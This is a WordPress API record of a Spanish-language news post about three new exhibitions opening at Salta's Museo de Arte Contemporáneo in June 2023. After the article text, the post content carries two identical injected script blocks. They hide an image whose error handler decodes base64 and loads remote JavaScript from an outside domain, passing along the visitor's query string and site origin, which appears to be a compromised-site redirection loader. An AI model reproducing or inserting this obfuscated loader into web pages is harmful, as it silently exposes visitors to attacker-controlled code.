{"id":2715,"date":"2023-06-10T21:17:04","date_gmt":"2023-06-11T00:17:04","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2715"},"modified":"2025-08-14T00:15:22","modified_gmt":"2025-08-14T03:15:22","slug":"junio-nuevas-muestras-para-visitar-en-el-mac","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2715","title":{"rendered":"Junio: Nuevas muestras para visitar en el MAC"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#c40837\"><em>El Museo de Arte Contempor\u00e1neo (MAC) inaugura nuevas muestras de Ivanna Constantini, Francisco Ratti y Mart\u00edn Mauricio Molina.<\/em><\/h3>\n\n\n\n<p>Hoy&nbsp;s\u00e1bado 10 de junio, el Museo de Arte Contempor\u00e1neo (MAC) inaugura nuevas muestras de Ivanna Constantini, Francisco Ratti y Mart\u00edn Mauricio Molina.<\/p>\n\n\n\n<p><strong>Proyecto V.A.C.A. Vitrales infinitos de Ivanna Costantini: Instalaci\u00f3n<\/strong><\/p>\n\n\n\n<p>La exposici\u00f3n se instala sobre los espacios de la vidriera del museo, donde la luz es el m\u00e1s noble de los fen\u00f3menos naturales porque es el menos material y el que m\u00e1s se asemeja a la forma pura. La artista construir\u00e1 muros transparentes que ir\u00e1n mutando seg\u00fan el correr de las horas.<\/p>\n\n\n\n<p><strong>Podr\u00eda escribir lo que pinto en el reverso de un pasacalles de Francisco Ratti: Curador Javier Soria V\u00e1zquez<\/strong><\/p>\n\n\n\n<p>Esta muestra consta de varias pinturas de formatos diversos y sujetas a soportes instalados en el espacio como esculturas u objetos portantes, se propone como una experiencia pict\u00f3rica y helicoidal en la que las paredes ceden su funci\u00f3n habitual de sost\u00e9n para configurarse como planos de contenci\u00f3n. Si bien las piezas se ubican en el espacio de un modo aparentemente aleatorio, desde cierto punto de observaci\u00f3n el conjunto de pinturas se configura como un solo cuerpo aludiendo a planos visuales en un monitor de computadora.<\/p>\n\n\n\n<p>Las piezas que componen esta instalaci\u00f3n, son ejecutadas mediante un procedimiento particular en el que Francisco Ratti crea en primera instancia cada pintura con herramientas b\u00e1sicas en su celular, para luego trasladarlas meticulosamente a lienzos de diferentes formatos.<\/p>\n\n\n\n<p><strong>Aquello que nos habita de Mart\u00edn Mauricio Molina. Curador Hern\u00e1n Ulm<\/strong><\/p>\n\n\n\n<p>\u201cAquello que nos Habita\u201d es la primera muestra individual del artista, donde re\u00fane la exploraci\u00f3n de diversas tem\u00e1ticas expresadas a trav\u00e9s de diferentes t\u00e9cnicas como la pintura, el dibujo e incursionando en lo textil. Obras reconocibles e in\u00e9ditas, hacen de \u00e9stas, partes indiscutibles del abanico evolutivo del artista. Lo acompa\u00f1a en la curadur\u00eda Hern\u00e1n Ulm,<\/p>\n\n\n\n<p>Licenciado y Magister en Filosof\u00eda por la UNSa y Doctor en Literatura por la Universidad Federal Fluminense de R\u00edo de Janeiro.<\/p>\n\n\n\n<p><strong>Progtrama Educamac<\/strong><\/p>\n\n\n\n<p>Visitas participativas para colegios e instituciones educativas<\/p>\n\n\n\n<p>Turnos para visitas: 0387 &nbsp;4370498 \/ educamac@gmail.com<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/junio-nuevas-muestras-para-visitar-en-el-mac-90078\" target=\"_blank\" rel=\"noopener\" title=\"\">\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Museo de Arte Contempor\u00e1neo (MAC) inaugura nuevas muestras de Ivanna Constantini, Francisco Ratti y Mart\u00edn Mauricio Molina. Hoy&nbsp;s\u00e1bado 10 de junio, el Museo de Arte Contempor\u00e1neo (MAC) inaugura nuevas muestras de Ivanna Constantini, Francisco Ratti y Mart\u00edn Mauricio Molina. Proyecto V.A.C.A. Vitrales infinitos de Ivanna Costantini: Instalaci\u00f3n La exposici\u00f3n se instala sobre los espacios [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2716,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2715","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2715"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2715"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2715\/revisions"}],"predecessor-version":[{"id":7062,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2715\/revisions\/7062"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2716"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2715"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2715"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2715"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}